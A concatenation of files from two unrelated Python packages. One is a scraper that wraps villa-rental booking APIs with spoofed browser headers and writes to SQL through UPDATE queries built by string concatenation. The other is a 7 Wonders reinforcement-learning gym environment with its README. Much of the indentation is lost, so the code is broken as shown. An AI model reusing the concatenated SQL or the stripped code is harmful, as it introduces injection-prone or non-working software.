property_deets['data']['checkin_date'] = checkin
property_deets['data']['checkout_date'] = checkout
property_deets['data']['weekday_pricing'] = weekday_pricing
property_deets['data']['weekend_pricing'] = weekend_pricing
property_deets['data']['entire_week_pricing'] = entire_week_pricing
property_deets['data']['entire_month_pricing'] = entire_month_pricing
property_deets['data']['price_per_room'] = property_deets['data']['price']['amount_to_be_paid']/property_deets['data']['property_detail']['number_of_rooms']
return property_deets['data']
# Calculates the price for a duration; if the dates are unavailable, it automatically checks the next available dates (recursive function)
def vista_price_calculator(property_id, checkin=datetime.date.today()+datetime.timedelta(1), checkout = datetime.date.today()+datetime.timedelta(2), guest = 2, adult = 2, child = 0, depth=0):
date_diff = (checkout-checkin).days
# Set the exit condition for the recursion depth ( to avoid an endless recursion -> slowing down the scripts )
if date_diff < 7:
depth_lim = 15
next_hop = 7
elif date_diff >= 7 and date_diff < 29:
depth_lim = 7
next_hop = 7
else:
depth_lim = 5
next_hop = date_diff
if depth==depth_lim:
return f"Villa Probably Inactive, checked till {checkin}"
if type(checkin)==str:
checkin = datetime.datetime.strptime(checkin,'%Y-%m-%d')
checkout = datetime.datetime.strptime(checkout,'%Y-%m-%d')
# Vista API call (Calculation)
pricing = vista_price_calculator_api(property_id=property_id, checkin=checkin, checkout=checkout, guest=guest, adult=adult, child=child)
if 'error' in pricing.keys():
# Recursion condition (Call self with next dates in case the dates are not available)
if pricing['error'] == 'Booking Not Available for these dates':
next_checkin = checkin + datetime.timedelta(next_hop)
next_chekout = checkout + datetime.timedelta(next_hop)
next_pricing = vista_price_calculator(property_id,checkin=next_checkin ,checkout=next_chekout,depth=depth+1)
return next_pricing
# For other errors (Like invalid listing ID)
else:
return pricing['error']
else:
return pricing['data']['price']
# Uses a list of slugs to generate a master DATAFRAME , this contains literally everything, ideal for any analysis on Vista
def vista_master_dataframe(slugs=(['vista-greenwoods-five-villa','maison-calme-villa','vista-greenwoods-four-villa','mehta-mansion','villa-maira'])):
total_slugs = len(slugs)
temp_progress_counter = 0
villas_deets = []
for slug in slugs:
try:
villa_deets = vista_listing(slug=slug)
villas_deets.append(villa_deets)
villas_df = pd.DataFrame(villas_deets)
temp_progress_counter += 1
clear_output(wait=True)
print("Done ",int((temp_progress_counter/total_slugs)*100),"%")
except:
pass
prop_detail_df = pd.DataFrame(list(villas_df['property_detail']))
agent_details_df = pd.DataFrame(list(villas_df['agent_details']))
price_df = pd.DataFrame(list(villas_df['price']))
literally_all_deets = pd.concat([prop_detail_df,villas_df,price_df,agent_details_df], axis=1)
literally_all_deets = literally_all_deets.drop(['property_detail','mini_gallery', 'base_url',
'agent_details', 'house_rule_pdf', 'mini_gallery_text',
'seo','number_extra_guest', 'additionalcost',
'days', 'min_occupancy', 'max_occupancy', 'amount_to_be_paid','total_guest',
'extra_adult', 'extra_child', 'extra_adult_cost', 'extra_child_cost',
'per_person','price','checkin_date','checkout_date','total_price','agent_short_words'], axis = 1)
literally_all_deets['amenities'] = [[amenity['name'] for amenity in amenities] for amenities in literally_all_deets['amenities']]
literally_all_deets['weekday_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['weekday_pricing']]
literally_all_deets['weekend_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['weekend_pricing']]
literally_all_deets['entire_week_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['entire_week_pricing']]
literally_all_deets['entire_month_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['entire_month_pricing']]
return literally_all_deets
# Takes 2 lists of listings (Old and New) and only responds with the Dataframe of the newly added listings
def added_villas_dataframe(old_slugs,new_slugs):
added_slugs = list(set(new_slugs).difference(set(old_slugs)))
added_villas = []
if added_slugs:
added_villas = vista_master_dataframe(added_slugs)
return added_villas
# Non Destructive SQL QUERY - Try "SELECT * FROM VISTA_MASTER"
def vista_sql_query(query,cypher_key):
# Returns a daframe object of the query response
myConnection = db_connection(cypher_key,database="vista")
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
# DESTRUCTIVE sql query
def vista_sql_destructive(query,cypher_key):
con = db_connection(cypher_key,database="vista")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
def vista_weekly_update_script(cypher_key,search_api_wait=10):
# Get the list of all the current villas lited
vista_search_data = vista_search_locations(get_all=True,wait_time=search_api_wait)
new_slugs = vista_search_data['slug'].values
query = "SELECT slug FROM VISTA_MASTER"
old_slugs = vista_sql_query(query,cypher_key)
old_slugs = old_slugs['slug'].values
# Get the list of recently added and removed slugs
added_slugs = list(set(new_slugs).difference(set(old_slugs)))
removed_slugs = list(set(old_slugs).difference(set(new_slugs)))
# Add the new listings to the Database
vista_newly_added_df = added_villas_dataframe(old_slugs,new_slugs)
vista_current_columns = vista_sql_query("SELECT * FROM VISTA_MASTER LIMIT 2",cypher_key).columns
dropcols = set(vista_newly_added_df).difference(set(vista_current_columns))
try:
vista_newly_added_df.drop(dropcols,axis=1,inplace=True)
except:
pass
if len(vista_newly_added_df) > 0:
vista_newly_added_df['listing_status'] = "LISTED"
vista_newly_added_df['status_on'] = datetime.datetime.today()
vista_newly_added_df['created_on'] = datetime.datetime.today()
    # changing all the "Object" data types to str (to avoid some weird error in SQL)
all_object_types = pd.DataFrame(vista_newly_added_df.dtypes)
all_object_types = all_object_types[all_object_types[0]=='object'].index
for column in all_object_types:
vista_newly_added_df[column] = vista_newly_added_df[column].astype('str')
#return vista_newly_added_df
engine = db_connection(cypher_key,database="vista")
for i in range(len(vista_newly_added_df)):
try:
vista_newly_added_df.iloc[i:i+1].to_sql(name='VISTA_MASTER',if_exists='append',con = engine,index=False)
except IntegrityError:
pass
engine.dispose()
# Update listing Statuses
vista_update_listing_status(cypher_key)
# A Summary of the updates
final_success_response = {
"No of Added Villas" : len(added_slugs),
"No of Removed Villas" : len(removed_slugs),
"Added Villas" : added_slugs,
"Removed Villas" : removed_slugs
}
return final_success_response
# Update listing status
def vista_update_listing_status(cypher_key):
get_ids_query ="SELECT id,listing_status FROM VISTA_MASTER"
vista_data = vista_sql_query(get_ids_query,cypher_key)
for id in vista_data[vista_data['listing_status']=='DELISTED']['id']:
stat = vista_check_if_listed(id)
print(id,stat)
if stat:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='LISTED',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
for id in vista_data[vista_data['listing_status']=='LISTED']['id']:
stat = vista_check_if_listed(id)
print(id,stat)
if not stat:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='DELISTED',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
# Interval-splitting search to find the blocked dates with as few API calls as possible
def vista_blocked_dates(property_id,ci,co):
# check if the listing is active
lt_status = vista_check_status(property_id)
if lt_status in ["INACTIVE","DELISTED"]:
return {
"id" : property_id,
"blocked_dates" : lt_status
}
# rg = Range => checkout - checkin (in days)
rg = (datetime.datetime.strptime(co, "%Y-%m-%d") - datetime.datetime.strptime(ci, "%Y-%m-%d")).days
api_calls = 0
# This list contains all the date ranges to be checked - there will be additions and subtractions to this list
DTE = [(ci,co,rg)]
# we will add the blocekd dates here
blocked = {}
explored = []
while len(DTE) != 0:
# To see how many API calls happened (fewer the better)
api_calls += 1
# Pick one item (date range) from the DTE list -> to see if it is available
dates = DTE.pop()
print(f"Checking : {dates[0]} for {dates[2]} days")
explored.append(dates)
checkin = dates[0]
checkout = dates[1]
    span = dates[2]  # length of this date interval in days
# Call the vista API to see of this is available
api_response = vista_price_calculator_api(property_id=property_id,checkin=checkin,checkout=checkout)
# If no error -> it is available, start the next iteration of the loop
if "error" not in api_response.keys():
print("Not Blocked")
continue
# if the range is unavailable do this
else:
print("Blocked")
# if the range is 1, mark the date as blocked
      if span == 1:
blocked[checkin] = api_response['data']['price']['amount_to_be_paid']
#blocked.append((checkin,api_response['data']['price']['amount_to_be_paid']))
# if the range is not 1, split the range in half and add both these ranges to the DTE list
else:
checkin_t = datetime.datetime.strptime(checkin, "%Y-%m-%d")
checkout_t = datetime.datetime.strptime(checkout, "%Y-%m-%d")
        middle_date = checkin_t + datetime.timedelta(math.ceil(span/2))
first_half = ( str(checkin_t)[:10] , str(middle_date)[:10] , (middle_date - checkin_t).days )
second_half = ( str(middle_date)[:10] , str(checkout_t)[:10] , (checkout_t - middle_date).days)
DTE.extend([first_half,second_half])
response_obj = {
"id" : property_id,
"blocked_dates" : blocked,
"meta_data": {
"total_blocked_dates" : len(blocked),
"api_calls":api_calls,
"checked from": ci,
"checked till":co
#"date_ranges_checked":explored
}
}
return response_obj
# To check if the villa is inactive (Listed but blocked for all dates)
def vista_check_status(property_id="",slug=""):
  if not vista_check_if_listed(property_id,slug):
    return "DELISTED"
  # The villa is listed, but it may still be blocked for every date:
  # probe a few future windows to tell LISTED apart from INACTIVE.
  min_nights = 1
  for i in [8,16,32,64,128]:
    price = vista_price_calculator_api(property_id , checkin=datetime.date.today()+datetime.timedelta(i), checkout = datetime.date.today()+datetime.timedelta(i + min_nights))
    if "error" not in price.keys():
      return "LISTED"
    if i == 128:
      return "INACTIVE"
    elif price['error'] == 'Booking Not Available for these dates':
      pass
    elif price['error'].split(" ")[4].isdigit():
      # The error message advertises a minimum-nights requirement; honour it.
      min_nights = int(price['error'].split(" ")[4])
def vista_check_if_listed(property_id="",slug=""):
if len(slug)>0:
try:
listing = vista_listing_api(slug)
property_id = listing['data']['property_detail']['id']
except:
return False
price = vista_price_calculator_api(property_id , checkin=datetime.date.today()+datetime.timedelta(5), checkout = datetime.date.today()+datetime.timedelta(7))
if "error" not in price.keys():
return True
elif isinstance(price['error'],str):
return True
elif 'property_id' in dict(price['error']).keys():
return False
return False
# Update listing status
def vista_update_listing_status_old(cypher_key):
get_ids_query ="SELECT id,listing_status FROM VISTA_MASTER"
vista_data = vista_sql_query(get_ids_query,cypher_key)
for id in vista_data[vista_data['listing_status']=='DELISTED']['id']:
print(id)
stat = vista_check_status(id)
print(id,stat)
if stat in ["LISTED","INACTIVE"]:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='"+stat+"',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
for id in vista_data[vista_data['listing_status']=='LISTED']['id']:
stat = vista_check_status(id)
print(id,stat)
if stat in ["DELISTED","INACTIVE"]:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='"+stat+"',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
for id in vista_data[vista_data['listing_status']=='INACTIVE']['id']:
stat = vista_check_status(id)
print(id,stat)
if stat in ["DELISTED","LISTED"]:
print("Updating database...")
query = "UPDATE VISTA_MASTER SET listing_status='"+stat+"',status_on='"+str(datetime.datetime.today())+"'WHERE id='"+str(id)+"'"
vista_sql_destructive(query,cypher_key)
def vista_update_listing_status(cypher_key):
get_ids_query ="SELECT id,listing_status FROM VISTA_MASTER"
vista_data = vista_sql_query(get_ids_query,cypher_key)
for i,r in vista_data.iterrows():
try:
old_status = r['listing_status']
cal = vista_availability_api(r['id'])
if "error" in cal.keys():
current_status = "DELISTED"
else:
cal = pd.DataFrame(cal['data'])
cal['date'] = cal['date'].astype('datetime64')
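        # Heuristic: the availability calendar appears to list blocked dates;
        # if more than ~88 of the next 90 days show up, every day is
        # effectively blocked, so the listing is treated as INACTIVE.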
if len(cal[cal['date']< datetime.datetime.today() + datetime.timedelta(90)])/88 > 1:
current_status = "INACTIVE"
else:
current_status = "LISTED"
if old_status != current_status:
print(f"Updating database for {r['id']} - {current_status}...")
query = f"UPDATE VISTA_MASTER SET listing_status='{current_status}',status_on='{str(datetime.datetime.today())}' WHERE id='{r['id']}'"
#print(query)
vista_sql_destructive(query,cypher_key)
else:
print(r['id'], "Unchanged")
except:
pass
"""# Lohono
```
# Lohono API wrappers
# Refining the APIs
# Master DataFrame
```
"""
# List of all lohono locations
def lohono_locations():
locations = ['india-alibaug','india-goa','india-lonavala','india-karjat']
return locations
# lohono Search API wrapper
def lohono_search_api(location_slug="india-goa",page=1):
url = "https://www.lohono.com/api/property"
params = {
'location_slug': location_slug,
'page': page
}
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/{ location_slug.split("-")[-1] }',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload, params=params)
search_data = json.loads(response.text.encode('utf8'))
return search_data
# lohono listing API wrapper
def lohono_listing_api(slug='prop-villa-magnolia-p5sp'):
url = f"https://www.lohono.com/api/property/{slug}"
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://www.lohono.com/villas/india/goa/prop-fonteira-vaddo-a-C6Cn',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload)
listing_data = json.loads(response.text.encode('utf8'))
return listing_data['response']
# lohono Pricing API wrapper
def lohono_pricing_api(slug,checkin,checkout,adult=2,child=0):
url = f"https://www.lohono.com/api/property/{slug}/price"
payload = "{\"property_slug\":\""+slug+"\",\"checkin_date\":\""+str(checkin)+"\",\"checkout_date\":\""+str(checkout)+"\",\"adult_count\":"+str(adult)+",\"child_count\":"+str(child)+",\"coupon_code\":\"\",\"price_package\":\"\",\"isEH\":false}"
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'content-type': 'application/json',
'origin': 'https://www.lohono.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/goa/{slug}?checkout_date={checkout}&adult_count={adult}&checkin_date={checkin}',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
response = requests.post(url, headers=headers, data = payload)
pricing_data = json.loads(response.text.encode('utf8'))
return pricing_data
# Basic details from the search API
def lohono_search(location_slugs=lohono_locations()):
    all_properties = []
    for location_slug in location_slugs:
        page = 1  # restart pagination for each location
        while True:
            print(f"page {page} for {location_slug}")
search_response = lohono_search_api(location_slug,page)
all_properties.extend(search_response['response']['properties'])
if search_response['paginate']['total_pages'] == page:
break
page += 1
return pd.DataFrame(all_properties)
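# Example usage (a sketch; requires network access to lohono.com):
#   goa_listings = lohono_search(['india-goa'])  # a single location
#   all_listings = lohono_search()               # every known location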
# All details for all the listings
def lohono_master_dataframe():
search_data = lohono_search()
slugs = search_data['property_slug'].values
all_properties = []
for slug in slugs:
print(f"getting {slug}")
listing_raw = lohono_listing_api(slug)
all_properties.append(listing_raw)
all_properties = pd.DataFrame(all_properties)
all_properties['amenities'] = [[amenity['name'] for amenity in amenities] for amenities in all_properties['amenities']]
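    # NOTE: the positional assignments below assume search_data rows and the
    # slug loop above share the same order.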
all_properties['price'] = search_data['rate']
all_properties['search_name'] = search_data['name']
return all_properties | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/vista.py | vista.py |
# 7Wonder-RL-Lib
A library providing a gym environment for testing reinforcement learning agents on the 7 Wonders board game.
<img alt="GitHub" src="https://img.shields.io/github/license/mirrorcraze/7Wonder-RL-Lib">
<img alt="GitHub issues" src="https://img.shields.io/github/issues/mirrorcraze/7Wonder-RL-Lib">
[](https://codecov.io/gh/MirrorCraze/7Wonder-RL-Lib)
[](https://github.com/MirrorCraze/7Wonder-RL-Lib/actions/workflows/github-code-scanning/codeql)
[](https://github.com/MirrorCraze/7Wonder-RL-Lib/actions/workflows/build.yml)
[](https://pypi.org/project/7Wonder-RL-Lib/0.1.0/)
[](https://mirrorcraze.github.io/7Wonder-RL-Lib/)
## Overview
There are multiple environments for testing game-playing AI. However, most existing environments cover only traditional board games (Go, Chess, etc.) or games based on a standard 52-card deck (Poker, Rummy, etc.), where players interact with one another in limited ways.
Euro-style board games make good test environments because they offer many aspects to explore, such as trading, imperfect information, and stochastic elements.
The 7 Wonders board game combines several of the elements mentioned above, which makes it a good testbed for new algorithms. This library covers the basic game systems and allows users to customize the environment with custom state spaces and reward systems.
## Installation
To install the gym environment, run
```
make develop
make build
make install
```
## Usage
An example of how to declare the gym environment is shown below:
```
import gymnasium as gym
import SevenWonEnv
from SevenWonEnv.envs.mainGameEnv import Personality

env = gym.make("SevenWonderEnv", player=4) # declare environment with 4 players
```
To use one of the provided personalities (RandomAI, RuleBasedAI, DQNAI, Human), call ```setPersonality(personalityList)```:
```
personalityList = []
personalityList.append(Personality.DQNAI)
for i in range(1, 4):
personalityList.append(Personality.RandomAI)
env.setPersonality(personalityList)
```
To advance the game by one turn:
```
stateList = env.step(None)
```
The variable ```stateList``` consists of n 4-tuples, where n is the number of players. Each tuple is (new_state, reward, done, info).
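For example, the per-player results can be unpacked as follows (a minimal sketch; variable names are illustrative):
```
stateList = env.step(None)
for player_index, (new_state, reward, done, info) in enumerate(stateList, start=1):
    print(player_index, reward, done)
```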
To add a custom model, edit the ```SevenWondersEnv/SevenWonEnv/envs/mainGameEnv/Personality.py``` file.
Each personality has two main functions: ```__init__``` and ```make_choice```.
For example, RandomAI takes all possible choices and randomly picks one.
```
class RandomAI(Personality):
def __init__(self):
super().__init__()
def make_choice(self, player, age, options):
return random.choice(range(len(options)))
```
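A custom personality follows the same shape. For instance, a minimal (hypothetical) FirstChoiceAI that always plays the first available option:
```
class FirstChoiceAI(Personality):
    def __init__(self):
        super().__init__()

    def make_choice(self, player, age, options):
        return 0  # index of the first option in the options list
```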
| 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/README.md | README.md |
# CONTRIBUTION GUIDELINE
## Prerequisites
* Python >=3.9
## Contribution
1. Fork the library and clone to your local machine
2. Install library and dependencies using
* ```make develop # Download all prerequisites ```
* ```make build # Build the library```
* ```make install # Install the gym environment```
## Making a PR
1. Run ```make lint``` and ```make test``` and make sure all tests pass
2. Submit the PR
## What to focus on now?
* More substantial tests (coverage is still low for now)
* Decoupling Personality.py so that adding a new Personality is easier
* Adding ways to use custom reward functions beyond the ones given
import gymnasium as gym
import sys
import copy
from gymnasium import spaces
import numpy as np
import json
import random
from operator import itemgetter
from SevenWonEnv.envs.mainGameEnv.mainHelper import filterPlayer, buildCard, rotateHand
from SevenWonEnv.envs.mainGameEnv.PlayerClass import Player
from SevenWonEnv.envs.mainGameEnv.WonderClass import Wonder
from SevenWonEnv.envs.mainGameEnv.resourceClass import Resource
from SevenWonEnv.envs.mainGameEnv.Personality import (
Personality,
RandomAI,
RuleBasedAI,
Human,
DQNAI,
)
from SevenWonEnv.envs.mainGameEnv.stageClass import Stage
EnvAmount = 0
class SevenWonderEnv(gym.Env):
#Private helper methods
def __loadWonder(self):
fileOper = open("mainGameEnv/Card/wonders_list.json", "rt")
wonderList = json.load(fileOper)
wonderList = wonderList["wonders"]
wonderName = list(wonderList.keys())
fileOper.close()
return wonderList, wonderName
def __actionToCode(self, cardCode, actionCode):
return cardCode * 4 + actionCode
def __codeToAction(self, action):
        cardCode = action // 4
actionCode = action % 4
# convert cardCode and actionCode to ones that can be used in step
card = self.dictCard[cardCode]
playlist = self.dictPlay[actionCode]
return card, playlist
def __initActionSpace(self):
counter = 0
fileOper = open("mainGameEnv/Card/card_list.json", "rt")
cardList = json.load(fileOper)
for age in cardList:
for playerNum in cardList[age]:
for color in cardList[age][playerNum]:
for card in cardList[age][playerNum][color]:
if not card["name"] in self.dictCard.values():
self.dictCard[counter] = card["name"]
counter += 1
for key, value in self.dictCard.items():
self.dictCardToCode[value] = key
# for (key,value) in self.dictCardToCode.items():
# print(key,value)
fileOper.close()
# [playStatus,wonder,side,stage] for each card.
self.dictPlay[0] = [0, None, None, None] # playStatus 0 = play with paying cost
self.dictPlay[1] = [
1,
None,
None,
None,
] # playStatus 1 = play with effect freeStructure
self.dictPlay[2] = [
-1,
None,
None,
None,
] # playStatus -1 = discard the card for 3 coins
self.dictPlay[3] = [2, None, None, None] # upgrade wonders
metadata = {"render.modes": ["human"]}
def __addPlayer(self, personality):
assignNumber = self.player - self.unAssignedPersonality + 1
self.playerList[assignNumber].assignPersonality(personality)
self.unAssignedPersonality -= 1
print("Player {} is ".format(assignNumber), personality)
def __initGameNPerson(self, player):
self.unAssignedPersonality = player
fileOper = open("mainGameEnv/Card/card_list.json", "rt")
cardList = json.load(fileOper)
cardAge = []
for i in range(1, 4):
cardAge.append(self.getCardAge("age_" + str(i), player, cardList))
fileOper.close()
wonderList, wonderName = self.__loadWonder()
random.shuffle(wonderName)
wonderSelected = wonderName[0:player]
playerList = {}
for i in range(1, player + 1):
newPlayer = Player(i, player, Human)
side = "A" if random.randrange(2) % 2 == 0 else "B"
wonderCurName = wonderSelected[i - 1]
wonderCur = wonderList[wonderCurName]
initialResource = Resource(wonderCur["initial"]["type"], wonderCur["initial"]["amount"])
newWonders = Wonder(wonderCurName, side, initialResource, **wonderList[wonderCurName][side])
newPlayer.assignWonders(newWonders)
playerList[i] = newPlayer
for i in range(1, player + 1):
curPlayer = playerList[i]
playerList[i].assignLeftRight(playerList[curPlayer.left], playerList[curPlayer.right])
print("SETUP COMPLETE")
return cardAge, playerList
def __stateGenerator(self, playerNum):
state = []
for resourceAmount in self.playerList[playerNum].resource.values():
state.append(resourceAmount)
for colorAmount in self.playerList[playerNum].color.values():
state.append(colorAmount)
for eastPrice in self.playerList[playerNum].eastTradePrices.values():
state.append(eastPrice - 1)
for westPrice in self.playerList[playerNum].westTradePrices.values():
state.append(westPrice - 1)
state.append(self.playerList[playerNum].coin)
for resourceAmount in self.playerList[playerNum].left.resource.values():
state.append(resourceAmount)
for colorAmount in self.playerList[playerNum].left.color.values():
state.append(colorAmount)
for resourceAmount in self.playerList[playerNum].right.resource.values():
state.append(resourceAmount)
for colorAmount in self.playerList[playerNum].right.color.values():
state.append(colorAmount)
state.append(self.age - 1)
return state
def printPersonality(self):
for i in range(1, self.player + 1):
print(self.playerList[i].personality)
def __stepActionDict(self):
actionDict = {}
for i in range(1, self.player + 1):
card, action = self.playerList[i].playCard(self.age)
actionDict[i] = self.__actionToCode(card, action)
return actionDict
def __illegalAction(self, action, playerNum):
cardName, actionList = self.__codeToAction(action)
card = self.playerList[playerNum].findCardFromHand(cardName)
if card is None:
return True # Card not on hand
        if self.specialAction == 1:  # extra turn from a card effect: buildDiscarded
            if actionList[0] != 0:
                return True  # illegal: the discarded card must be played, not used for wonders or discarded
        # specialAction == 2 (playSeventhCard) follows the normal rules below;
        # the player still has to pay if needed.
        if actionList[0] == 2 and self.playerList[playerNum].wonders.stage + 1 >= len(
            self.playerList[playerNum].wonders.step
        ):
            return True  # illegal: the wonder is already fully built
return False
def __rewardCalculation(self, action, playerNum):
cardName, actionList = self.__codeToAction(action)
player = self.playerList[playerNum]
card = player.findCardFromHand(cardName)
info = {}
done = False
reward = 0
if self.__illegalAction(action, playerNum):
state = self.__stateGenerator(playerNum)
vecState = np.array(state).reshape((70,))
return vecState, -10000, done, info
left, right = player.playable(card)
if self.specialAction != 0: # extraTurn from card effect
if self.specialAction == 1: # buildDiscarded
left, right = (0, 0)
selectedCard = [card, left, right, actionList[0]]
cardGet, action = player.playChosenCard(selectedCard)
player.assignHand(copy.deepcopy(self.tempCardList))
self.specialAction = 0
player.endTurnEffect = None
# specialAction=2 : playSeventhCard. Still have to pay (if needed)
else:
if actionList[0] != 2: # discard/play
selectedCard = [card, left, right, actionList[0]]
else: # use for upgrade
selectedCard = [
player.wonders.step[player.wonders.stage + 1],
left,
right,
0,
card,
]
cardGet, action = player.playChosenCard(selectedCard)
self.specialAction = 0
state = self.__stateGenerator(playerNum)
vecState = np.array(state).reshape((70,))
if self.turn == 6 and "extraPlay" not in info.keys():
for j in range(len(self.playerList)):
self.discarded.append(self.playerList[j + 1].hand[0])
# print(self.playerList[j + 1].hand)
if player.endAgeEffect == "playSeventhCard":
info["extraPlay"] = "playSeventhCard"
self.specialAction = 2
if self.age == 3 and "extraPlay" not in info.keys():
endScore = []
for i in range(len(self.playerList)):
endScore.append((i + 1, self.playerList[i + 1].endGameCal()))
endScore = sorted(endScore, key=itemgetter(1), reverse=True)
# for (key, value) in endScore:
# print("Player {} score {}".format(key, value))
for i in range(len(endScore)):
key = endScore[i][0]
# print(key)
if key == playerNum: # endScore[i] is DQN, not RBAI
if i == 0:
reward = 1.5
elif i == 1:
reward = 0.5
elif i == 2:
reward = -0.5
elif i == 3:
reward = -1.5
done = True
elif not "extraPlay" in info.keys(): # end Age
self.age += 1
self.turn = 0
for i in range(len(self.playerList)):
self.playerList[i + 1].assignHand(self.cardShuffled[self.age - 1][i])
if any("freeStructure" in effect for effect in self.playerList[i + 1].endAgeEffect):
self.playerList[i + 1].freeStructure = True
return vecState, reward, done, info
else:
self.turn += 1
if actionList[0] != 2: # discard/play
if actionList[0] == 1: # play with effect = no cost
player.freeStructure = False
left, right = (0, 0)
selectedCard = [card, left, right, actionList[0]]
else:
selectedCard = [
player.wonders.step[player.wonders.stage + 1],
left,
right,
0,
card,
]
cardGet, action = player.playChosenCard(selectedCard)
if action == -1:
self.discarded.append(card)
state = self.__stateGenerator(playerNum)
vecState = np.array(state).reshape((70,))
return vecState, reward, done, info
#Public methods
def __init__(self, player):
"""
Initialize the environment with given amount of player
Args:
player: amount of player
"""
global EnvAmount
super(SevenWonderEnv, self).__init__()
self.player = player
self.dictPlay = {}
self.dictCard = {}
self.dictCardToCode = {}
self.personalityList = []
self.__initActionSpace()
path = "GameLog/gameLog" + str(EnvAmount) + ".txt"
EnvAmount = EnvAmount + 1
# sys.stdout = open(path, 'w')
# action space
# 75 unique cards to play * (play(2, use effect FREESTRUCTURE and NOT use effect) + discard(1) + upgradeWonder(1) = 4 action per card) = 300 total actions
# action = 4*cardCode + actionCode
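        # Worked example (illustrative codes only): cardCode 10 with actionCode 2
        # (discard) encodes to action 4 * 10 + 2 = 42, and __codeToAction(42)
        # recovers cardCode 10 and actionCode 2.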
self.action_space = spaces.Discrete(300)
# observation space
# resourceAmountOwn(11) + colorAmountOwn(7)+ownEastTradingCost(7)+ownWestTradingCost(7)+ coin (1) resourceAmountLeft(11)+colorAmountLeft(7)
# +resourceAmountRight(11)+colorAmountRight(7)+AgeNumber(1)
# =observation_space of 70
obserSpaceSize = (
([5] * 10 + [20] + [10] * 7 + [2] * 7 + [2] * 7 + [100])
+ ([5] * 10 + [20] + [10] * 7)
+ ([5] * 10 + [20] + [10] * 7)
+ [3]
)
self.observation_space = spaces.MultiDiscrete(obserSpaceSize)
self.discarded = []
self.cardAge = None
self.playerList = None
self.age = 1
self.turn = 0
self.cardShuffled = []
self.specialAction = 0
self.tempCardList = []
self.unAssignedPersonality = 0
self.cardAge, self.playerList = self.__initGameNPerson(self.player)
for ageNum in range(1, 4):
cardThisAge = self.cardAge[ageNum - 1]
random.shuffle(cardThisAge)
self.cardShuffled.append([cardThisAge[i : i + 7] for i in range(0, len(cardThisAge), 7)])
for i in range(len(self.cardShuffled[0])):
self.playerList[i + 1].assignHand(self.cardShuffled[0][i])
print("Setup complete")
def setPersonality(self, personalityList):
"""
Set the personality for each player.
Args:
personalityList: List[Personality]
"""
self.personalityList = personalityList
for personality in personalityList:
if self.unAssignedPersonality == 0:
sys.exit("Program Stopped : Add too many players' personality")
self.__addPlayer(personality)
def getCardAge(self, age, player, cardList):
jsonAge = filterPlayer(cardList[age], player)
cardAge = []
for color in jsonAge:
for card in jsonAge[color]:
card = buildCard(card["name"], color, card["payResource"], card["getResource"])
cardAge.append(card)
return cardAge
def step(self, action):
"""
Proceed one turn of the game.
Args:
action: 0 by default.
Returns:
List[tuple] containing (new_state, reward, done, info)
"""
if self.unAssignedPersonality != 0:
sys.exit("Program Stopped : Some Players do not have personality.")
rewardAll = []
for j in range(0, len(self.playerList)):
card, action = self.playerList[j + 1].playCard(self.age)
print("Card, action", card, action)
actionCode = self.__actionToCode(self.dictCardToCode[card.name], action)
vecState, reward, done, info = self.__rewardCalculation(actionCode, j + 1)
rewardAll.append((vecState, reward, done, info))
if action == -1: # card discarded
self.discarded.append(card)
print("PLAYER {} discard {}".format(j + 1, card.name))
elif action == 2:
print("PLAYER {} upgrade wonders to stage {}".format(j + 1, self.playerList[j + 1].wonders.stage))
else:
print("PLAYER {} play {}".format(j + 1, card.name))
rotateHand(self.playerList, self.age)
for j in range(len(self.playerList)):
player = self.playerList[j + 1]
if player.endTurnEffect == "buildDiscarded":
if not self.discarded:
continue
# print("DISCARDED")
# for dis in self.discarded:
# print(dis.name)
if j == 0:
info["extraPlay"] = "buildDiscarded"
self.specialAction = 1
self.tempCardList = copy.deepcopy(player.hand)
player.hand = self.discarded
else:
card, action = player.playFromEffect(self.discarded, player.endTurnEffect, self.age)
removeCard = None
for disCard in self.discarded:
if disCard.name == card.name:
removeCard = disCard
break
self.discarded.remove(removeCard)
# print("BEFORE AGE" + str(self.age) + "TURN" + str(self.turn))
# for playerNum in self.playerList:
